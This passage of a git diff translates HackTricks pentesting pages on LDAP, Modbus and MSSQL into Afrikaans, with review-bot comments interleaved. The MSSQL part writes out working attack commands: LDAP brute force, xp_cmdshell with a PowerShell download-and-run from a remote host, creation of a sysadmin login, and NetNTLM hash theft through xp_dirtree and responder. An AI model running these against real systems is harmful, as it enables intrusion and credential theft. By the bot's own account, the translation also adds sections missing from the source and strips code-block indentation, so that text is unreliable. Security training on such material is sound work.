-E -o "description.*" | sort | uniq -u ``` +Jy kan John voer met die wagwoordhash (van '{SSHA}' tot 'struktureel' sonder om 'struktureel' by te voeg). -You can feed john with the password hash (from '{SSHA}' to 'structural' without adding 'structural'). 
+### Konfigurasie Lêers -### Configuration Files - -* General - * containers.ldif - * ldap.cfg - * ldap.conf - * ldap.xml - * ldap-config.xml - * ldap-realm.xml - * slapd.conf -* IBM SecureWay V3 server - * V3.sas.oc -* Microsoft Active Directory server - * msadClassesAttrs.ldif +* Algemeen +* containers.ldif +* ldap.cfg +* ldap.conf +* ldap.xml +* ldap-config.xml +* ldap-realm.xml +* slapd.conf +* IBM SecureWay V3-bediener +* V3.sas.oc +* Microsoft Active Directory-bediener +* msadClassesAttrs.ldif * Netscape Directory Server 4 - * nsslapd.sas\_at.conf - * nsslapd.sas\_oc.conf -* OpenLDAP directory server - * slapd.sas\_at.conf - * slapd.sas\_oc.conf +* nsslapd.sas\_at.conf +* nsslapd.sas\_oc.conf +* OpenLDAP-directory-bediener +* slapd.sas\_at.conf +* slapd.sas\_oc.conf * Sun ONE Directory Server 5.1 - * 75sas.ldif - -## HackTricks Automatic Commands +* 75sas.ldif +## HackTricks Outomatiese Opdragte ``` Protocol_Name: LDAP #Protocol Abbreviation if there is one. Port_Number: 389,636 #Comma separated if there is more than one. Protocol_Description: Lightweight Directory Access Protocol #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for LDAP - Note: | - The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint. +Name: Notes +Description: Notes for LDAP +Note: | +The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint. 
- https://book.hacktricks.xyz/pentesting/pentesting-ldap +https://book.hacktricks.xyz/pentesting/pentesting-ldap Entry_2: - Name: Banner Grab - Description: Grab LDAP Banner - Command: nmap -p 389 --script ldap-search -Pn {IP} +Name: Banner Grab +Description: Grab LDAP Banner +Command: nmap -p 389 --script ldap-search -Pn {IP} Entry_3: - Name: LdapSearch - Description: Base LdapSearch - Command: ldapsearch -H ldap://{IP} -x +Name: LdapSearch +Description: Base LdapSearch +Command: ldapsearch -H ldap://{IP} -x Entry_4: - Name: LdapSearch Naming Context Dump - Description: Attempt to get LDAP Naming Context - Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts +Name: LdapSearch Naming Context Dump +Description: Attempt to get LDAP Naming Context +Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts Entry_5: - Name: LdapSearch Big Dump - Description: Need Naming Context to do big dump - Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}" +Name: LdapSearch Big Dump +Description: Need Naming Context to do big dump +Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}" Entry_6: - Name: Hydra Brute Force - Description: Need User - Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f +Name: Hydra Brute Force +Description: Need User +Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
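Review bot: the `### Konfigurasie Lêers` list in this hunk loses its nesting: the indented sub-items (`-    * containers.ldif`, `-    * V3.sas.oc`, `-    * nsslapd.sas\_at.conf`, and so on) come back as top-level `+* containers.ldif` lines, so the file names no longer sit under their server headings (Algemeen, IBM SecureWay V3, Netscape, OpenLDAP, Sun ONE). Restore the four-space indent on the sub-items. The same indentation stripping hits the `HackTricks Automatic Commands` fenced block: `-    Name: Notes`, `-    Description: ...`, `-    Command: ...` become unindented `+Name:`/`+Description:`/`+Command:` lines, which rewrites the structure of a code block that a translation should leave byte-for-byte untouched; the `-    Note: |` block and the `-    https://book.hacktricks.xyz/...` line are affected the same way. On wording, `+Jy kan dit toegang in` is not grammatical (`Jy kan dit kry by` reads naturally), and `hakse` for hashes is unclear; keep `hashes` as the technical term, as the `{SSHA}` sentence below already does.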
diff --git a/network-services-pentesting/pentesting-modbus.md b/network-services-pentesting/pentesting-modbus.md index 4350f1e8c..d012c3419 100644 --- a/network-services-pentesting/pentesting-modbus.md +++ b/network-services-pentesting/pentesting-modbus.md @@ -1,52 +1,83 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Basic Information +# Basiese Inligting -In 1979, the **Modbus Protocol** was developed by Modicon, serving as a messaging structure. Its primary use involves facilitating communication between intelligent devices, operating under a master-slave/client-server model. This protocol plays a crucial role in enabling devices to exchange data efficiently. - -**Default port:** 502 +In 1979 is die **Modbus-protokol** ontwikkel deur Modicon en dien as 'n boodskapstruktuur. Dit word hoofsaaklik gebruik om kommunikasie tussen intelligente toestelle te fasiliteer, wat werk volgens 'n meester-slaaf/kliënt-bedienermodel. Hierdie protokol speel 'n belangrike rol in die effektiewe uitruil van data tussen toestelle. +**Verstekpoort:** 502 ``` PORT STATE SERVICE 502/tcp open modbus ``` +# Opname -# Enumeration +## Modbus +Modbus is 'n kommunikasieprotokol wat gebruik word vir die kommunikasie tussen industriële beheerstelsels en toestelle. Dit is 'n oop protokol en word dikwels gebruik in industriële omgewings soos fabrieke en kragstasies. + +### Modbus TCP + +Modbus TCP is 'n uitbreiding van die Modbus-protokol wat gebruik maak van TCP/IP-verbindinge. Dit maak gebruik van die TCP-poort 502 vir kommunikasie. + +Om Modbus TCP te ondersoek, kan jy die volgende stappe volg: + +1. Identifiseer die IP-adres van die Modbus TCP-bedieners. +2. Skandeer die TCP-poort 502 om aktiewe Modbus TCP-bedieners te vind. +3. Identifiseer die Modbus-eenheid-ID's wat deur die bedieners gebruik word. +4. Voer 'n Modbus-leesoperasie uit om data van die bedieners te onttrek. +5. Analiseer die verkrygde data om inligting oor die bedieners en hul funksies te verkry. + +### Modbus RTU + +Modbus RTU is 'n ander uitbreiding van die Modbus-protokol wat gebruik maak van seriële kommunikasie. Dit maak gebruik van RS-232 of RS-485-verbindinge. + +Om Modbus RTU te ondersoek, kan jy die volgende stappe volg: + +1. Identifiseer die seriële poorte wat gebruik word vir Modbus RTU-kommunikasie. +2. 
Skandeer die poorte om aktiewe Modbus RTU-toestelle te vind. +3. Identifiseer die Modbus-eenheid-ID's wat deur die toestelle gebruik word. +4. Voer 'n Modbus-leesoperasie uit om data van die toestelle te onttrek. +5. Analiseer die verkrygde data om inligting oor die toestelle en hul funksies te verkry. + +### Modbus ASCII + +Modbus ASCII is 'n ander uitbreiding van die Modbus-protokol wat gebruik maak van ASCII-karakters vir kommunikasie. Dit maak gebruik van RS-232-verbindinge. + +Om Modbus ASCII te ondersoek, kan jy die volgende stappe volg: + +1. Identifiseer die seriële poorte wat gebruik word vir Modbus ASCII-kommunikasie. +2. Skandeer die poorte om aktiewe Modbus ASCII-toestelle te vind. +3. Identifiseer die Modbus-eenheid-ID's wat deur die toestelle gebruik word. +4. Voer 'n Modbus-leesoperasie uit om data van die toestelle te onttrek. +5. Analiseer die verkrygde data om inligting oor die toestelle en hul funksies te verkry. ```bash nmap --script modbus-discover -p 502 msf> use auxiliary/scanner/scada/modbusdetect msf> use auxiliary/scanner/scada/modbus_findunitid ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
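Review bot: the `## Modbus`, `### Modbus TCP`, `### Modbus RTU` and `### Modbus ASCII` sections with their five-step lists are new material that does not exist in the English source (the hunk grows from 52 to 83 lines while only translating). A translation commit should not introduce new sections, and these generic steps say nothing the original page says, so they should be dropped and `# Enumeration` translated as a bare `# Opname` heading followed directly by the existing `nmap --script modbus-discover` / `msf>` block. Separately, the deleted blank lines around the fences (the `-` line after `**Default port:** 502` and the `-` line after the closing fence) should be kept so `+**Verstekpoort:** 502` is not glued to the ```` ``` ```` fence and the markdown renders as before.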
- - diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index bf671da8d..2eb3ad4ca 100644 --- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md @@ -2,64 +2,59 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -## Basic Information +## Basiese Inligting -From [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server): +Van [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server): -> **Microsoft SQL Server** is a **relational database** management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).\ - -**Default port:** 1433 +> **Microsoft SQL Server** is 'n **relasionele databasis**-bestuurstelsel wat deur Microsoft ontwikkel is. Dit is 'n sagtewareproduk met die primêre funksie om data te stoor en op te haal soos versoek deur ander sagtewaretoepassings—wat óf op dieselfde rekenaar óf op 'n ander rekenaar oor 'n netwerk (insluitend die internet) kan loop. +**Verstekpoort:** 1433 ``` 1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM ``` +### **Verstek MS-SQL Stelsel Tabelle** -### **Default MS-SQL System Tables** - -* **master Database**: This database is crucial as it captures all system-level details for a SQL Server instance. 
-* **msdb Database**: SQL Server Agent utilizes this database to manage scheduling for alerts and jobs. -* **model Database**: Acts as a blueprint for every new database on the SQL Server instance, where any alterations like size, collation, recovery model, and more are mirrored in newly created databases. -* **Resource Database**: A read-only database that houses system objects that come with SQL Server. These objects, while stored physically in the Resource database, are logically presented in the sys schema of every database. -* **tempdb Database**: Serves as a temporary storage area for transient objects or intermediate result sets. +* **master Databasis**: Hierdie databasis is krities omdat dit alle stelselvlak besonderhede vir 'n SQL Server instansie vasvang. +* **msdb Databasis**: SQL Server Agent maak gebruik van hierdie databasis om skedulering vir waarskuwings en take te bestuur. +* **model Databasis**: Tree op as 'n bloudruk vir elke nuwe databasis op die SQL Server instansie, waar enige veranderinge soos grootte, sortering, herstelmodel, en meer in nuut geskepte databasisse weerspieël word. +* **Resource Databasis**: 'n Lees-slegs databasis wat stelselvoorwerpe bevat wat met SQL Server saamkom. Hierdie voorwerpe, alhoewel fisies in die Resource databasis gestoor word, word logies voorgestel in die sys skema van elke databasis. +* **tempdb Databasis**: Diens as 'n tydelike bergingsarea vir tydelike voorwerpe of tussenresultate. 
-## Enumeration +## Opname -### Automatic Enumeration - -If you don't know nothing about the service: +### Outomatiese Opname +As jy niks weet van die diens nie: ```bash nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 msf> use auxiliary/scanner/mssql/mssql_ping ``` - {% hint style="info" %} -If you **don't** **have credentials** you can try to guess them. You can use nmap or metasploit. Be careful, you can **block accounts** if you fail login several times using an existing username. +As jy **nie** **geloofsbriewe het** nie, kan jy probeer om dit te raai. Jy kan nmap of metasploit gebruik. Wees versigtig, jy kan **rekeninge blokkeer** as jy verskeie kere probeer om in te teken met 'n bestaande gebruikersnaam en misluk. {% endhint %} -#### Metasploit (need creds) - +#### Metasploit (benodig geloofsbriewe) ```bash #Set USERNAME, RHOSTS and PASSWORD #Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used @@ -91,13 +86,11 @@ msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload #Add new admin user from meterpreter session msf> use windows/manage/mssql_local_auth_bypass ``` - ### [**Brute force**](../../generic-methodologies-and-resources/brute-force.md#sql-server) -### Manual Enumeration - -#### Login +### Handmatige Opsomming +#### Aantekening ```bash # Using Impacket mssqlclient.py mssqlclient.py [-db volume] /:@ 
@@ -107,14 +100,128 @@ mssqlclient.py [-db volume] -windows-auth /:@ # Using sqsh sqsh -S -U -P -D ## In case Windows Auth using "." as domain name for local user -sqsh -S -U .\\ -P -D +sqsh -S -U .\\ -P -D ## In sqsh you need to use GO after writting the query to send it 1> select 1; 2> go ``` +#### Algemene Opsomming -#### Common Enumeration +##### MSSQL Server Version Detection +Om die weergawe van die MSSQL-diens te bepaal, kan jy die volgende metodes gebruik: + +- **Metode 1**: Voer die volgende opdrag uit in die SQL Server Management Studio (SSMS): + +```sql +SELECT @@VERSION; +``` + +- **Metode 2**: Voer die volgende opdrag uit in 'n opdragvenster: + +```bash +sqlcmd -S -U -P -Q "SELECT @@VERSION" +``` + +##### Lys van databasisse + +Om 'n lys van databasisse op die MSSQL-diens te kry, kan jy die volgende metodes gebruik: + +- **Metode 1**: Voer die volgende opdrag uit in SSMS: + +```sql +SELECT name FROM sys.databases; +``` + +- **Metode 2**: Voer die volgende opdrag uit in 'n opdragvenster: + +```bash +sqlcmd -S -U -P -Q "SELECT name FROM sys.databases" +``` + +##### Lys van tabelle in 'n spesifieke databasis + +Om 'n lys van tabelle in 'n spesifieke databasis op die MSSQL-diens te kry, kan jy die volgende metodes gebruik: + +- **Metode 1**: Voer die volgende opdrag uit in SSMS: + +```sql +USE ; +SELECT name FROM sys.tables; +``` + +- **Metode 2**: Voer die volgende opdrag uit in 'n opdragvenster: + +```bash +sqlcmd -S -U -P -d -Q "SELECT name FROM sys.tables" +``` + +##### Lys van kolomme in 'n spesifieke tabel + +Om 'n lys van kolomme in 'n spesifieke tabel op die MSSQL-diens te kry, kan jy die volgende metodes gebruik: + +- **Metode 1**: Voer die volgende opdrag uit in SSMS: + +```sql +USE ; +SELECT name FROM sys.columns WHERE object_id = OBJECT_ID(''); +``` + +- **Metode 2**: Voer die volgende opdrag uit in 'n opdragvenster: + +```bash +sqlcmd -S -U -P -d -Q "SELECT name FROM sys.columns WHERE object_id = OBJECT_ID('')" +``` + +##### Lys van stored 
procedures in 'n spesifieke databasis + +Om 'n lys van stored procedures in 'n spesifieke databasis op die MSSQL-diens te kry, kan jy die volgende metodes gebruik: + +- **Metode 1**: Voer die volgende opdrag uit in SSMS: + +```sql +USE ; +SELECT name FROM sys.procedures; +``` + +- **Metode 2**: Voer die volgende opdrag uit in 'n opdragvenster: + +```bash +sqlcmd -S -U -P -d -Q "SELECT name FROM sys.procedures" +``` + +##### Lys van gebruikers in 'n spesifieke databasis + +Om 'n lys van gebruikers in 'n spesifieke databasis op die MSSQL-diens te kry, kan jy die volgende metodes gebruik: + +- **Metode 1**: Voer die volgende opdrag uit in SSMS: + +```sql +USE ; +SELECT name FROM sys.sysusers WHERE issqlrole = 0 AND isntname = 1; +``` + +- **Metode 2**: Voer die volgende opdrag uit in 'n opdragvenster: + +```bash +sqlcmd -S -U -P -d -Q "SELECT name FROM sys.sysusers WHERE issqlrole = 0 AND isntname = 1" +``` + +##### Lys van SQL Server-logins + +Om 'n lys van SQL Server-logins op die MSSQL-diens te kry, kan jy die volgende metodes gebruik: + +- **Metode 1**: Voer die volgende opdrag uit in SSMS: + +```sql +SELECT name FROM sys.syslogins; +``` + +- **Metode 2**: Voer die volgende opdrag uit in 'n opdragvenster: + +```bash +sqlcmd -S -U -P -Q "SELECT name FROM sys.syslogins" +``` ```sql # Get version select @@version; 
@@ -136,23 +243,21 @@ select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!' EXEC sp_addsrvrolemember 'hacker', 'sysadmin' ``` - -#### Get User +#### Kry Gebruiker {% content-ref url="types-of-mssql-users.md" %} [types-of-mssql-users.md](types-of-mssql-users.md) {% endcontent-ref %} - ```sql # Get all the users and roles select * from sys.database_principals; ## This query filters a bit the results select name, - create_date, - modify_date, - type_desc as type, - authentication_type_desc as authentication_type, - sid +create_date, +modify_date, +type_desc as type, +authentication_type_desc as authentication_type, +sid from sys.database_principals where type not in ('A', 'R') order by name; 
@@ -162,20 +267,18 @@ order by name; EXEC sp_helpuser SELECT * FROM sysusers ``` +#### Kry Toestemmings -#### Get Permissions +1. **Beveiligbaar:** Gedefinieer as die hulpbronne wat deur SQL Server bestuur word vir toegangsbeheer. Hierdie word gekategoriseer as: +- **Bediener** - Voorbeelde sluit databasisse, logins, eindpunte, beskikbaarheidsgroepe en bedienersrolle in. +- **Databasis** - Voorbeelde dek databasisrolle, toepassingsrolle, skemas, sertifikate, volledige tekskatalogusse en gebruikers. +- **Skema** - Sluit tabelle, aansigte, prosedures, funksies, sinonieme, ens. in. -1. **Securable:** Defined as the resources managed by SQL Server for access control. These are categorized into: - - **Server** – Examples include databases, logins, endpoints, availability groups, and server roles. - - **Database** – Examples cover database role, application roles, schema, certificates, full text catalogs, and users. - - **Schema** – Includes tables, views, procedures, functions, synonyms, etc. - -2. **Permission:** Associated with SQL Server securables, permissions such as ALTER, CONTROL, and CREATE can be granted to a principal. Management of permissions occurs at two levels: - - **Server Level** using logins - - **Database Level** using users - -3. **Principal:** This term refers to the entity that is granted permission to a securable. Principals mainly include logins and database users. The control over access to securables is exercised through the granting or denying of permissions or by including logins and users in roles equipped with access rights. +2. **Toestemming:** Verband hou met SQL Server beveiligbare, toestemmings soos ALTER, CONTROL en CREATE kan aan 'n beginsel verleen word. Bestuur van toestemmings vind plaas op twee vlakke: +- **Bedienervlak** met behulp van logins +- **Databasisvlak** met behulp van gebruikers +3. **Beginsel:** Hierdie term verwys na die entiteit wat toestemming verleen word tot 'n beveiligbare. 
Beginsels sluit hoofsaaklik logins en databasisgebruikers in. Die beheer oor toegang tot beveiligbare word uitgeoefen deur die verlening of weiering van toestemmings of deur logins en gebruikers in rolle met toegangsregte in te sluit. ```sql # Show all different securables names SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT); @@ -195,20 +298,17 @@ SELECT IS_SRVROLEMEMBER('sysadmin'); Use master EXEC sp_helprotect 'xp_cmdshell' ``` +## Truuks -## Tricks - -### Execute OS Commands +### Voer OS-opdragte uit {% hint style="danger" %} -Note that in order to be able to execute commands it's not only necessary to have **`xp_cmdshell`** **enabled**, but also have the **EXECUTE permission on the `xp_cmdshell` stored procedure**. You can get who (except sysadmins) can use **`xp_cmdshell`** with: - +Let daarop dat dit nie net nodig is om opdragte uit te voer nie, maar ook om die **`xp_cmdshell`** **ingeskakel** te hê, en ook die **UITVOER-bevoegdheid op die `xp_cmdshell`-gebergte prosedure** te hê. Jy kan sien wie (behalwe sysadmins) **`xp_cmdshell`** kan gebruik met: ```sql Use master EXEC sp_helprotect 'xp_cmdshell' ``` {% endhint %} - ```bash # Username + Password + CMD command crackmapexec mssql -d -u -p -x "whoami" @@ -236,11 +336,9 @@ EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.1 # Bypass blackisted "EXEC xp_cmdshell" '; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' — ``` +### Steel NetNTLM hash / Relay aanval -### Steal NetNTLM hash / Relay attack - -You should start a **SMB server** to capture the hash used in the authentication (`impacket-smbserver` or `responder` for example). - +Jy moet 'n **SMB-bediener** begin om die hash wat in die outentifikasie gebruik word, vas te vang (`impacket-smbserver` of `responder` byvoorbeeld). ```bash xp_dirtree '\\\any\thing' exec master.dbo.xp_dirtree '\\\any\thing' 
@@ -252,10 +350,8 @@ sudo responder -I tun0 sudo impacket-smbserver share ./ -smb2support msf> use auxiliary/admin/mssql/mssql_ntlm_stealer ``` - {% hint style="warning" %} -You can check if who (apart sysadmins) has permissions to run those MSSQL functions with: - +Jy kan nagaan wie (behalwe vir sysadmins) toestemming het om daardie MSSQL funksies uit te voer met: ```sql Use master; EXEC sp_helprotect 'xp_dirtree'; 
@@ -264,25 +360,24 @@ EXEC sp_helprotect 'xp_fileexist'; ``` {% endhint %} -Using tools such as **responder** or **Inveigh** it's possible to **steal the NetNTLM hash**.\ -You can see how to use these tools in: +Deur gebruik te maak van hulpmiddels soos **responder** of **Inveigh**, is dit moontlik om die NetNTLM-hash te **steel**.\ +Jy kan sien hoe om hierdie hulpmiddels te gebruik in: {% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %} [spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) {% endcontent-ref %} -### Abusing MSSQL trusted Links +### Misbruik van MSSQL vertroue skakels -[**Read this post**](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **to find more information about how to abuse this feature:** +[**Lees hierdie berig**](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **om meer inligting te vind oor hoe om hierdie funksie te misbruik:** {% content-ref url="../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md" %} [abusing-ad-mssql.md](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) {% endcontent-ref %} -### **Write Files** - -To write files using `MSSQL`, we **need to enable** [**Ole Automation Procedures**](https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option), which requires admin privileges, and then execute some stored procedures to create the file: +### **Skryf Lêers** +Om lêers te skryf met behulp van `MSSQL`, moet ons **Ole Automation Procedures** [**aktiveer**](https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option), wat admin-voorregte vereis, en dan sekere gestoorde prosedures 
